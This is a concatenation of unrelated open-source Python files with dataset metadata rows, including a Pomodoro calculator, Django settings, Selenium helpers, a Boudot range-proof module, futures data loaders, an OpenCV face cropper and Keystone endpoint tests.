row = river.row_data['main'].rowAsList(1)
testrow = [6.0, 37.2, 0.039, False, 1.0, '', 0.0, 0.0, '', '~']
self.assertListEqual(testrow, row)
# Add with all args
args = {rdt.CHAINAGE: 6.1, rdt.ELEVATION: 37.4, rdt.ROUGHNESS: 0.06,
rdt.PANEL_MARKER: True, rdt.RPL: 1.1, rdt.BANKMARKER: 'BED',
rdt.EASTING: 22.5, rdt.NORTHING: 32.5, rdt.DEACTIVATION: 'RIGHT',
rdt.SPECIAL: '16'}
river.addRow(args, index=2)
row = river.row_data['main'].rowAsList(2)
testrow = [6.1, 37.4, 0.06, True, 1.1, 'BED', 22.5, 32.5, 'RIGHT', '16']
self.assertListEqual(testrow, row)
# Check it fails without required args
args = {rdt.CHAINAGE: 6.2}
with self.assertRaises(AttributeError):
river.addRow(args, index=3)
args = {rdt.ELEVATION: 36.2}
with self.assertRaises(AttributeError):
river.addRow(args, index=3)
# Check we catch non increasing chainage
args = {rdt.CHAINAGE: 5.0, rdt.ELEVATION: 37.2}
with self.assertRaises(ValueError):
river.addRow(args, index=3)
| mit | -1,056,165,014,091,718,900 | 63.461165 | 144 | 0.498607 | false |
Matt-Deacalion/Pomodoro-Calculator | pomodoro_calculator/__init__.py | 1 | 6013 | """
A pretty command line tool to calculate the number
of Pomodori available between two points in time.
"""
__author__ = 'Matt Deacalion Stevens'
__version__ = '1.0.2'
import datetime
from itertools import cycle
class PomodoroCalculator:
"""
Calculates the number of Pomodori available in an amount of time.
"""
def __init__(self, end, start='now', short_break=5, long_break=15,
pomodoro_length=25, group_length=4, interval=False, amount=False):
self.pomodoro_length_seconds = pomodoro_length * 60
self.amount_mode = False
if start == 'now':
self.start = datetime.datetime.now()
else:
self.start = self._create_datetime(start)
if interval:
self.end = self.start + self._create_timedelta(end)
elif amount:
# set dummy end. So we don't crash.
self.end = self.start + self._create_timedelta("48:00:00")
self.amount_mode = True
self.amount = int(end)
else:
self.end = self._create_datetime(end)
# if the end time is earlier than the start,
# overlap to the next day
if self.end.time() < self.start.time():
self.end += datetime.timedelta(days=1)
self.group_length = group_length
self.short_break = short_break
self.long_break = long_break
@property
def short_break_seconds(self):
"""
Returns `short_break` in seconds.
"""
return self.short_break * 60
@property
def long_break_seconds(self):
"""
Returns `long_break` in seconds.
"""
return self.long_break * 60
@property
def total_seconds(self):
"""
Return the total time span in seconds.
"""
delta = self.end - self.start
return int(delta.total_seconds())
def _create_timedelta(self, time_string):
"""
Takes a string in the format of 'HH:MM:SS' and returns a timedelta.
"""
args = dict(zip(
['hours', 'minutes', 'seconds'],
[int(unit) for unit in time_string.split(':')],
))
return datetime.timedelta(**args)
def _create_datetime(self, time_string):
"""
Takes a string in the format of 'HH:MM:SS' and returns a datetime.
"""
args = dict(zip(
['hour', 'minute', 'second'],
[int(unit) for unit in time_string.split(':')],
))
return datetime.datetime.now().replace(**args)
def _get_item(self, offset, item_type, index):
"""
Returns one of three types of Pomodori entities. A short break, a long
break or the Pomodoro itself. The returned dict also contains the
start and end datetimes.
"""
types = {
'short-break': self.short_break_seconds,
'long-break': self.long_break_seconds,
'pomodoro': self.pomodoro_length_seconds,
}
start = self.end - datetime.timedelta(seconds=offset)
end = start + datetime.timedelta(seconds=types[item_type])
return {
'index': index,
'pomodori-index': index // 2 + 1,
'type': item_type,
'start': start,
'end': end,
'length': int((end - start).total_seconds()),
}
def pomodori_segments(self, group_length=4):
"""
Generate Pomodori along with the short and long breaks in between.
Credit: http://codereview.stackexchange.com/questions/53970
"""
# every fourth Pomodori precedes a long break,
# all others have short breaks following them
return cycle(
['pomodoro', 'short-break'] * (group_length - 1) + ['pomodoro', 'long-break'],
)
def pomodori_schedule(self):
"""
Returns a Pomodori schedule, which is a dict that contains a
list of Pomodori segments (Pomodoro, short break or long
break) in chronological order.
Credit: http://codereview.stackexchange.com/questions/53970
"""
available_time = self.total_seconds
segments = []
# make sure we have enough time for at least one Pomodoro
if available_time < self.pomodoro_length_seconds:
return
for i, segment_name in enumerate(self.pomodori_segments(self.group_length)):
segment = self._get_item(available_time, segment_name, i + 1)
if self.amount_mode and segment['pomodori-index'] > self.amount:
break
elif segment['length'] > available_time:
break
available_time -= segment['length']
segments.append(segment)
if segments and segments[-1]['type'].endswith('break'):
segments.pop()
work_segments = [seg for seg in segments if seg['type'] == 'pomodoro']
rest_segments = [seg for seg in segments if seg['type'].endswith('break')]
return {
'segments': segments,
'start': self.start,
'end': segments[-1]['end'],
'seconds-per-pomodoro': self.pomodoro_length_seconds,
'total-pomodori': len(work_segments),
'total-breaks': len(rest_segments),
'total-rest-time': sum(seg['length'] for seg in rest_segments),
'total-work-time': sum(seg['length'] for seg in work_segments),
}
def humanise_seconds(seconds):
"""
Takes `seconds` as an integer and returns a human readable
string, e.g. "2 hours, 5 minutes".
"""
units = []
unit_table = [('hour', 3600), ('minute', 60)]
for unit in unit_table:
quotient, seconds = divmod(seconds, unit[1])
if quotient:
units.append(
'{} {}'.format(
quotient,
unit[0] + ('s' if quotient > 1 else ''),
)
)
return ', '.join(units)
| mit | 6,045,448,055,413,695,000 | 30.317708 | 90 | 0.557126 | false |
Yukarumya/Yukarum-Redfoxes | taskcluster/taskgraph/task/checksums_signing.py | 1 | 1076 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from __future__ import absolute_import, print_function, unicode_literals
from . import transform
class ChecksumsSigningTask(transform.TransformTask):
"""
A task implementing a checksums signing job. These depend on beetmover jobs
and sign the checksums after its being generated by beetmover
"""
@classmethod
def get_inputs(cls, kind, path, config, params, loaded_tasks):
if (config.get('kind-dependencies', []) != ["beetmover", "beetmover-l10n"]):
raise Exception("Checksums signing tasks must depend on beetmover tasks")
for task in loaded_tasks:
if not task.attributes.get('nightly'):
continue
if task.kind not in config.get('kind-dependencies'):
continue
checksums_signing_task = {'dependent-task': task}
yield checksums_signing_task
| mpl-2.0 | -1,961,531,478,082,989,000 | 38.851852 | 85 | 0.667286 | false |
colour-science/colour-branding | utilities/colour.py | 1 | 1033 | import maya.cmds as cmds
import numpy as np
spectrum = np.load(
r"D:\Documents\Personal\Graphics\Colour\spectrum.npy")[:, 35:325, :]
materials = [u'mia_material_x01', u'mia_material_x02', u'mia_material_x03',
u'mia_material_x04', u'mia_material_x05', u'mia_material_x06',
u'mia_material_x07', u'mia_material_x08', u'mia_material_x09',
u'mia_material_x10', u'mia_material_x11', u'mia_material_x12', ]
samples = np.linspace(0, 1, len(materials))
for i, material in enumerate(materials):
R = np.interp(samples[i], np.linspace(0, 1, spectrum.shape[1]),
spectrum[..., 0][0])
G = np.interp(samples[i], np.linspace(0, 1, spectrum.shape[1]),
spectrum[..., 1][0])
B = np.interp(samples[i], np.linspace(0, 1, spectrum.shape[1]),
spectrum[..., 2][0])
# m = max(R, G, B)
m = 1
cmds.setAttr('{0}.diffuse'.format(material),
R / m, G / m, B / m,
type='double3')
| bsd-3-clause | 428,703,372,718,615,200 | 37.730769 | 77 | 0.549855 | false |
alainrinder/quoridor.py | src/GridCoordinates.py | 1 | 2281 | #
# GridCoordinates.py
#
# @author Alain Rinder
# @date 2017.06.02
# @version 0.1
#
class GridCoordinates:
"""
Coordinates on square grid
"""
def __init__(self, col, row):
self.col = col
self.row = row
def left(self):
"""
Return the coordinates of the square at left, even if it does not exists
"""
return GridCoordinates(self.col - 1, self.row)
def right(self):
"""
Return the coordinates of the square at right, even if it does not exists
"""
return GridCoordinates(self.col + 1, self.row)
def top(self):
"""
Return the coordinates of the square at top, even if it does not exists
"""
return GridCoordinates(self.col, self.row - 1)
def bottom(self):
"""
Return the coordinates of the square at bottom, even if it does not exists
"""
return GridCoordinates(self.col, self.row + 1)
def clone(self):
"""
Return identical coordinates
"""
return GridCoordinates(self.col, self.row)
def __eq__(self, other):
"""
Override the default Equals behavior.
https://stackoverflow.com/questions/390250/elegant-ways-to-support-equivalence-equality-in-python-classes
"""
if isinstance(other, self.__class__):
#return self.__dict__ == other.__dict__
return self.col == other.col and self.row == other.row
return NotImplemented
def __ne__(self, other):
"""
Define a non-equality test.
https://stackoverflow.com/questions/390250/elegant-ways-to-support-equivalence-equality-in-python-classes
"""
if isinstance(other, self.__class__):
return not self.__eq__(other)
return NotImplemented
def __hash__(self):
"""
Override the default hash behavior (that returns the id or the object).
https://stackoverflow.com/questions/390250/elegant-ways-to-support-equivalence-equality-in-python-classes
"""
return hash((self.col, self.row))
def __str__(self):
return "%d,%d" % (self.col, self.row)
| mit | 4,232,492,451,206,281,700 | 26.873418 | 113 | 0.562034 | false |
inspirehep/inspire-next | tests/unit/records/test_records_wrappers.py | 1 | 6282 | # -*- coding: utf-8 -*-
#
# This file is part of INSPIRE.
# Copyright (C) 2014-2017 CERN.
#
# INSPIRE is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# INSPIRE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with INSPIRE. If not, see <http://www.gnu.org/licenses/>.
#
# In applying this license, CERN does not waive the privileges and immunities
# granted to it by virtue of its status as an Intergovernmental Organization
# or submit itself to any jurisdiction.
from __future__ import absolute_import, division, print_function
from inspirehep.modules.records.wrappers import LiteratureRecord
def test_literature_record_external_system_identifiers():
record = LiteratureRecord({
'external_system_identifiers': [
{
'schema': 'DESY',
'value': 'D04-00213',
},
{
'schema': 'ADS',
'value': '2004PrPh...52..200K',
},
{
'schema': 'ADS',
'value': '2006PhR...429..121K',
},
{
'schema': 'SPIRES',
'value': 'SPIRES-5682037',
},
],
})
expected = [
{
'url_link': 'http://adsabs.harvard.edu/abs/2004PrPh...52..200K',
'url_name': 'ADS Abstract Service',
},
]
result = record.external_system_identifiers
assert expected == result
def test_literature_record_external_system_identifiers_handles_kekscan():
record = LiteratureRecord({
'external_system_identifiers': [
{
'schema': 'DESY',
'value': 'D04-00213',
},
{
'schema': 'CDS',
'value': '2231692',
},
{
'schema': 'CDS',
'value': '2232052',
},
{
'schema': 'HAL',
'value': 'in2p3-01394924',
},
{
'schema': 'KEKSCAN',
'value': '200727065',
},
],
})
expected = [
{
'url_link': 'http://cds.cern.ch/record/2231692',
'url_name': 'CERN Document Server',
},
{
'url_link': 'https://hal.archives-ouvertes.fr/in2p3-01394924',
'url_name': 'HAL Archives Ouvertes',
},
{
'url_link': 'https://lib-extopc.kek.jp/preprints/PDF/2007/0727/0727065.pdf',
'url_name': 'KEK scanned document',
},
]
result = record.external_system_identifiers
assert expected == result
def test_literature_record_publication_information_with_pubinfo_freetext():
record = LiteratureRecord({
'publication_info': [
{
'pubinfo_freetext': 'Symmetry 10, 287 (2018)',
},
{
'cnum': 'C93-07-01',
'conference_recid': 968950,
'conference_record': {
'$ref': 'http://labs.inspirehep.net/api/conferences/968950'
},
},
],
})
expected = [
{
'pubinfo_freetext': 'Symmetry 10, 287 (2018)',
},
]
assert expected == record.publication_information
def test_literature_record_publication_information_with_journal_title():
record = LiteratureRecord({
'publication_info': [
{
'artid': '128',
'journal_issue': '7',
'journal_title': 'Astropart.Phys.',
'journal_volume': '103',
'material': 'erratum',
'page_end': '48',
'page_start': '41',
'year': '2018',
},
{
'cnum': 'C93-07-01',
'conference_recid': 968950,
'conference_record': {
'$ref': 'http://labs.inspirehep.net/api/conferences/968950'
},
},
],
})
expected = [
{
'artid': '128',
'journal_issue': '7',
'journal_title': 'Astropart.Phys.',
'journal_volume': '103',
'material': 'erratum',
'page_end': '48',
'page_start': '41',
'year': '2018',
},
]
assert expected == record.publication_information
def test_literature_record_publication_information_handles_missing_fields():
record = LiteratureRecord({
'publication_info': [
{
'journal_title': 'Astropart.Phys.',
'year': 2018,
'pubinfo_freetext': 'Symmetry 10, 287 (2018)',
},
{
'cnum': 'C93-07-01',
'conference_recid': 968950,
'conference_record': {
'$ref': 'http://labs.inspirehep.net/api/conferences/968950'
},
},
],
})
expected = [
{
'journal_title': 'Astropart.Phys.',
'year': '2018',
'pubinfo_freetext': 'Symmetry 10, 287 (2018)',
},
]
assert expected == record.publication_information
def test_literature_record_publication_information_no_journal_title_or_pubinfo_freetext():
record = LiteratureRecord({
'publication_info': [
{
'cnum': 'C93-07-01',
'conference_recid': 968950,
'conference_record': {
'$ref': 'http://labs.inspirehep.net/api/conferences/968950'
},
},
],
})
assert not record.publication_information
def test_literature_record_publication_information_no_publication_info():
record = LiteratureRecord({})
assert not record.publication_information
| gpl-3.0 | 8,572,558,101,036,677,000 | 27.816514 | 90 | 0.498408 | false |
brunofin/coinvalue | backend/backend/settings.py | 1 | 2626 | # -*- coding: utf-8 -*-
"""
Django settings for backend project.
Generated by 'django-admin startproject' using Django 1.8.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'flny4$zxzcc-sno24n6m35=xg($c^&q*mil_31v#99cbj(^iw$'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'corsheaders',
'currency',
'apiv1',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'backend.urls'
CORS_ORIGIN_ALLOW_ALL = True
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'backend.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'CET'
USE_I18N = True
USE_L10N = True
USE_TZ = True | gpl-3.0 | -8,834,992,552,321,021,000 | 24.504854 | 71 | 0.686976 | false |
Coriolan8/python_traning | fixture/session.py | 1 | 1518 |
__author__ = "yulya"
class SessionHelper:
def __init__(self, app):
self.app = app
def Login(self, username, password):
wd = self.app.wd
self.app.open_home_page()
wd.find_element_by_name("user").click()
wd.find_element_by_name("user").clear()
wd.find_element_by_name("user").send_keys(username)
wd.find_element_by_id("content").click()
wd.find_element_by_name("pass").click()
wd.find_element_by_name("pass").clear()
wd.find_element_by_name("pass").send_keys(password)
wd.find_element_by_xpath('input[type="submit"]').click()
def logout(self):
wd = self.app.wd
wd.find_element_by_link_text("Logout").click()
def is_logged_in(self):
wd = self.app.wd
return len(wd.find_element_by_link_text("Logout").click()) > 0
def is_logged_in_as(self, username):
wd = self.app.wd
return self.get_logged_user() == username
def get_logged_user(self):
wd = self.app.wd
return wd.find_element_by_xpath ("//dev/dev[1]/form/b").text[1:-1]
def ensure_logout(self):
wd = self.app.wd
if self.is_logged_in():
self.logout()
def ensure_login(self, username, password):
wd = self.app.wd
if self.is_logged_in():
if self.is_logged_in_as(username):
return
else:
self.logout()
self.login(username,password) | apache-2.0 | 7,454,230,980,946,180,000 | 28.211538 | 78 | 0.54809 | false |
grmToolbox/grmpy | promotion/grmpy_tutorial/create_slides.py | 1 | 1443 | #!/usr/bin/env python
"""This module compiles the lecture notes."""
import argparse
import glob
import os
import shutil
import subprocess
def compile_single(is_update):
"""Compile a single lecture."""
for task in ["pdflatex", "bibtex", "pdflatex", "pdflatex"]:
cmd = [task, "main"]
subprocess.check_call(cmd)
if is_update:
shutil.copy(
"main.pdf", "../../distribution/" + os.getcwd().split("/")[-1] + ".pdf"
)
if __name__ == "__main__":
parser = argparse.ArgumentParser(" Create slides for lecture")
parser.add_argument(
"--update", action="store_true", dest="update", help="update public slides"
)
is_complete = "lectures" == os.getcwd().split("/")[-1]
is_update = parser.parse_args().update
if is_complete:
for dirname in glob.glob("0*"):
os.chdir(dirname)
compile_single(is_update)
os.chdir("../")
# I also want to have a complete deck of slides available. This is not intended
# for public distribution.
fnames = []
for fname in sorted(glob.glob("0*")):
fnames += [fname + "/main.pdf"]
cmd = "pdftk " + " ".join(fnames) + " cat output course_deck.pdf"
subprocess.check_call(cmd, shell=True)
if is_update:
shutil.copy("course_deck.pdf", "../distribution/course_deck.pdf")
else:
compile_single(is_update)
| mit | 3,772,548,930,021,324,300 | 27.294118 | 87 | 0.57727 | false |
qstokkink/py-ipv8 | ipv8/attestation/wallet/pengbaorange/boudot.py | 1 | 4606 | """
Implementation of proofs for checking commitment equality and if a commitment is a square ("Efficient Proofs that a
Committed NumberLies in an Interval" by F. Boudot).
Modified for use with range proofs ("An efficient range proof scheme." by K. Peng and F. Bao).
"""
from binascii import hexlify
from math import ceil, log
from os import urandom
from struct import pack, unpack
from ..primitives.attestation import sha256_as_int
from ..primitives.structs import ipack, iunpack
from ..primitives.value import FP2Value
def secure_randint(nmin, nmax):
normalized_range = nmax - nmin
n = int(ceil(log(normalized_range, 2) / 8.0))
rbytes_int = int(hexlify(urandom(n)), 16)
return nmin + (rbytes_int % normalized_range)
def _sipack(*n):
if len(n) > 8:
raise RuntimeError("More than 8 values specified to _sipack")
sign_byte = 0
packed = b''
for i in n:
sign_byte = sign_byte << 1
sign_byte |= 1 if i < 0 else 0
packed = ipack(-i if i < 0 else i) + packed
return pack(">B", sign_byte) + packed
def _siunpack(buf, amount):
rem = buf[1:]
nums = []
sign_byte, = unpack(">B", buf[0:1])
while rem and len(nums) < amount:
unpacked, rem = iunpack(rem)
negative = sign_byte & 0x01
sign_byte = sign_byte >> 1
nums.append(-unpacked if negative else unpacked)
return reversed(nums), rem
class EL(object):
def __init__(self, c, D, D1, D2):
self.c = c
self.D = D
self.D1 = D1
self.D2 = D2
@classmethod
def create(cls, x, r1, r2, g1, h1, g2, h2, b, bitspace, t=80, l=40): # pylint: disable=R0913,R0914
maxrange_w = 2 ^ (l + t) * b - 1
maxrange_n = 2 ^ (l + t + bitspace) * g1.mod - 1
w = secure_randint(1, maxrange_w)
n1 = secure_randint(1, maxrange_n)
n2 = secure_randint(1, maxrange_n)
W1 = g1.intpow(w) * h1.intpow(n1)
W2 = g2.intpow(w) * h2.intpow(n2)
cW1 = (W1.wp_nominator() * W1.wp_denom_inverse()).normalize()
cW2 = (W2.wp_nominator() * W2.wp_denom_inverse()).normalize()
c = sha256_as_int(str(cW1.a).encode('utf-8') + str(cW1.b).encode('utf-8')
+ str(cW2.a).encode('utf-8') + str(cW2.b).encode('utf-8'))
D = w + c * x
D1 = n1 + c * r1
D2 = n2 + c * r2
return cls(c, D, D1, D2)
def check(self, g1, h1, g2, h2, y1, y2):
cW1 = g1.intpow(self.D) * h1.intpow(self.D1) * y1.intpow(-self.c)
cW2 = g2.intpow(self.D) * h2.intpow(self.D2) * y2.intpow(-self.c)
cW1 = (cW1.wp_nominator() * cW1.wp_denom_inverse()).normalize()
cW2 = (cW2.wp_nominator() * cW2.wp_denom_inverse()).normalize()
return self.c == sha256_as_int(str(cW1.a).encode('utf-8') + str(cW1.b).encode('utf-8')
+ str(cW2.a).encode('utf-8') + str(cW2.b).encode('utf-8'))
def serialize(self):
return _sipack(self.c, self.D, self.D1, self.D2)
@classmethod
def unserialize(cls, s):
unpacked, rem = _siunpack(s, 4)
return cls(*unpacked), rem
def __eq__(self, other):
if not isinstance(other, EL):
return False
return (self.c == other.c) and (self.D == other.D) and (self.D1 == other.D1) and (self.D2 == other.D2)
def __hash__(self):
return 6976
def __str__(self):
return 'EL<%d,%d,%d,%d>' % (self.c, self.D, self.D1, self.D2)
class SQR(object):
def __init__(self, F, el):
self.F = F
self.el = el
@classmethod
def create(cls, x, r1, g, h, b, bitspace):
r2 = secure_randint(-2 ^ bitspace * g.mod + 1, 2 ^ bitspace * g.mod - 1)
F = g.intpow(x) * h.intpow(r2)
r3 = r1 - r2 * x
return cls(F, EL.create(x, r2, r3, g, h, F, h, b, bitspace))
def check(self, g, h, y):
return self.el.check(g, h, self.F, h, self.F, y)
def serialize(self):
min_f = self.F.wp_compress()
return ipack(min_f.mod) + ipack(min_f.a) + ipack(min_f.b) + self.el.serialize()
@classmethod
def unserialize(cls, s):
rem = s
mod, rem = iunpack(rem)
Fa, rem = iunpack(rem)
Fb, rem = iunpack(rem)
el, rem = EL.unserialize(rem)
return cls(FP2Value(mod, Fa, Fb), el), rem
def __eq__(self, other):
if not isinstance(other, SQR):
return False
return (self.F == other.F) and (self.el == other.el)
def __hash__(self):
return 838182
def __str__(self):
return 'SQR<%s,%s>' % (str(self.F), str(self.el))
| lgpl-3.0 | 3,775,615,382,115,306,500 | 31.43662 | 115 | 0.558402 | false |
lamter/slaveo | loadhistory/futures.py | 1 | 4133 | # coding: utf-8
import pymongo
import pandas as pd
import datetime
try:
from .newbar import NewMinuteBar, NewDayBar
except SystemError:
pass
class LoadBase(object):
"""
导入期货历史数据
"""
def __init__(self, path, symbol):
"""
:param path: 数据路径
:param contract: 合约名
:return:
"""
self.symbol = symbol
self.client = pymongo.MongoClient("localhost", 27017)
self.data = self.load(path)
def __exit__(self, exc_type, exc_val, exc_tb):
if self.client:
# 关闭链接
self.client.close()
def load(self, path):
# 取得 actionDay, 有些 date 是 trade day ,夜盘问题
# self.get_action_day(None)
raise NotImplementedError
def get_action_day(self, df):
"""
将 Index 转为
:return:
"""
# 下午8点肯定收盘了
close_time = datetime.time(20)
def action_day(dt):
if dt.time() > close_time:
# 日期前移1天
return dt - datetime.timedelta(days=1)
else:
# 不变
return dt
df['datetime'] = df['datetime'].apply(action_day)
return df
def to_vnpy(self):
"""
导入到vnpy的数据库中
:return:
"""
raise NotImplementedError
class LoadTdxMinHis(LoadBase):
"""
从通达信的历史数据导入分钟
"""
def load(self, path):
df = pd.read_csv(
path,
# index_col='datetime',
names=['date', 'time', 'open', 'high', 'low', 'close', 'volume', 'position', 'settlement'],
parse_dates={'datetime': ["date", "time"]},
keep_date_col=True,
engine="python",
skip_footer=1,
encoding='gbk',
)
# 获得 action day
return self.get_action_day(df)
def to_vnpy(self, dbn_1min, dbn_5min, dbn_10min):
"""
导入到vnpy的数据库中
:return:
"""
self.to_vnpy_bar1(dbn_1min)
self.to_vnpy_bar5(dbn_5min)
self.to_vnpy_bar10(dbn_10min)
def to_vnpy_bar1(self, dbn_1min):
dbn_1min = self.client[dbn_1min]
db_bar1 = dbn_1min[self.symbol]
data = self.data
print(u"清空数据库%s" % db_bar1)
db_bar1.drop()
db_bar1.insert_many(data.to_dict('record'))
def to_vnpy_bar5(self, dbn_5min):
db_bar5 = self.client[dbn_5min][self.symbol]
data = self.data
# 转为5分钟K线
bar5 = NewMinuteBar(data, 5).new()
print(u"清空数据库%s" % db_bar5)
db_bar5.drop()
db_bar5.insert_many(bar5.to_dict('record'))
def to_vnpy_bar10(self, dbn_10min):
db_bar10 = self.client[dbn_10min][self.symbol]
data = self.data
# 转为10分钟K线
bar10 = NewMinuteBar(data, 10).new()
print(u"清空数据库%s" % db_bar10)
db_bar10.drop()
db_bar10.insert_many(bar10.to_dict('record'))
class LoadTdxDailyHis(LoadBase):
"""
从通达信的历史数据导入, 日线数据
"""
def load(self, path):
return pd.read_csv(
path,
# index_col='datetime',
names=['date', 'open', 'high', 'low', 'close', 'volume', 'position', 'settlement'],
parse_dates={'datetime': ["date"]},
keep_date_col=True,
engine="python",
skip_footer=1,
encoding='gbk',
)
def to_vnpy(self, dbn_1day):
"""
:return:
"""
self.to_vnpy_day_bar1(dbn_1day)
def to_vnpy_day_bar1(self, dbn_1day):
"""
分钟线计算收盘价是不准确的,因为有收盘价和结算价,有些结算价是收盘最后3分钟的平均价格
:return:
"""
self.db_day_bar1 = self.client["VnTrader_Daily_Db"][symbol]
db_day_bar1 = self.db_day_bar1
data = self.data
db_day_bar1.drop()
db_day_bar1.insert(data.to_dict('record'))
| gpl-3.0 | -6,288,002,198,736,356,000 | 23.324841 | 103 | 0.515318 | false |
PuercoPop/FaceRec | apps/WebUi/testhaar.py | 1 | 1298 | import cv
import os
from os.path import join
from django.conf import settings
def find_faces( img_url ):
cascade = cv.Load( join(settings.ROOT_DIR,'apps/WebUi/haarcascade_frontalface_alt.xml') )
directory= join(settings.MEDIA_ROOT , 'Uploads/')
target_directory = join( directory, 'Portraits/')
portrait_list = []
img = cv.LoadImage( directory + img_url)
imgGray = cv.CreateImage( cv.GetSize(img), img.depth , 1)
cv.CvtColor(img, imgGray, cv.CV_BGR2GRAY)
faces = cv.HaarDetectObjects( imgGray, cascade , cv.CreateMemStorage(),)
if len(faces)>0:
print "Detecto Algo"
else:
print "Miss"
for counter , ((x, y, w, h), n) in enumerate(faces):
cv.SetImageROI(img, (x,y,w,h ) )#Fija la region de interes
imgface = cv.CreateImage( cv.GetSize(img),img.depth,img.nChannels)
imgface_rsz = cv.CreateImage( (128,128) ,img.depth,img.nChannels)
cv.Copy(img,imgface)
cv.Resize(imgface, imgface_rsz, cv.CV_INTER_AREA)
cv.SaveImage( target_directory + str(img_url[:-4]) + "_" + str(counter ) +".png",imgface_rsz)
portrait_list.append( 'Uploads/Portraits/' + str(img_url[:-4]) + "_" + str(counter ) +".png")
cv.ResetImageROI(img)
return portrait_list
if __name__ == "__main__":
find_faces_dir( '../MockUpCode/Images/')
| bsd-2-clause | 2,583,801,675,626,725,000 | 30.658537 | 97 | 0.656394 | false |
noironetworks/heat | heat/tests/openstack/keystone/test_endpoint.py | 1 | 15826 | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import mock
from heat.engine.clients.os.keystone import fake_keystoneclient as fake_ks
from heat.engine import constraints
from heat.engine import properties
from heat.engine import resource
from heat.engine.resources.openstack.keystone import endpoint
from heat.engine import stack
from heat.engine import template
from heat.tests import common
from heat.tests import utils
keystone_endpoint_template = {
'heat_template_version': '2015-04-30',
'resources': {
'test_endpoint': {
'type': 'OS::Keystone::Endpoint',
'properties': {
'service': 'heat',
'region': 'RegionOne',
'interface': 'public',
'url': 'http://127.0.0.1:8004/v1/tenant-id',
'name': 'endpoint_foo',
'enabled': False
}
}
}
}
class KeystoneEndpointTest(common.HeatTestCase):
def setUp(self):
super(KeystoneEndpointTest, self).setUp()
self.ctx = utils.dummy_context()
# Mock client
self.keystoneclient = mock.Mock()
self.patchobject(resource.Resource, 'client',
return_value=fake_ks.FakeKeystoneClient(
client=self.keystoneclient))
self.endpoints = self.keystoneclient.endpoints
# Mock client plugin
self.keystone_client_plugin = mock.MagicMock()
def _get_mock_endpoint(self):
value = mock.MagicMock()
value.id = '477e8273-60a7-4c41-b683-fdb0bc7cd152'
return value
def _setup_endpoint_resource(self, stack_name, use_default=False):
tmpl_data = copy.deepcopy(keystone_endpoint_template)
if use_default:
props = tmpl_data['resources']['test_endpoint']['properties']
del props['name']
del props['enabled']
test_stack = stack.Stack(
self.ctx, stack_name,
template.Template(tmpl_data)
)
r_endpoint = test_stack['test_endpoint']
r_endpoint.client = mock.MagicMock()
r_endpoint.client.return_value = self.keystoneclient
r_endpoint.client_plugin = mock.MagicMock()
r_endpoint.client_plugin.return_value = self.keystone_client_plugin
return r_endpoint
def test_endpoint_handle_create(self):
rsrc = self._setup_endpoint_resource('test_endpoint_create')
mock_endpoint = self._get_mock_endpoint()
self.endpoints.create.return_value = mock_endpoint
# validate the properties
self.assertEqual(
'heat', rsrc.properties.get(endpoint.KeystoneEndpoint.SERVICE))
self.assertEqual(
'public',
rsrc.properties.get(endpoint.KeystoneEndpoint.INTERFACE))
self.assertEqual(
'RegionOne',
rsrc.properties.get(endpoint.KeystoneEndpoint.REGION))
self.assertEqual(
'http://127.0.0.1:8004/v1/tenant-id',
rsrc.properties.get(endpoint.KeystoneEndpoint.SERVICE_URL))
self.assertEqual(
'endpoint_foo',
rsrc.properties.get(endpoint.KeystoneEndpoint.NAME))
self.assertFalse(rsrc.properties.get(
endpoint.KeystoneEndpoint.ENABLED))
rsrc.handle_create()
# validate endpoint creation
self.endpoints.create.assert_called_once_with(
service='heat',
url='http://127.0.0.1:8004/v1/tenant-id',
interface='public',
region='RegionOne',
name='endpoint_foo',
enabled=False)
# validate physical resource id
self.assertEqual(mock_endpoint.id, rsrc.resource_id)
def test_endpoint_handle_create_default(self):
rsrc = self._setup_endpoint_resource('test_create_with_defaults',
use_default=True)
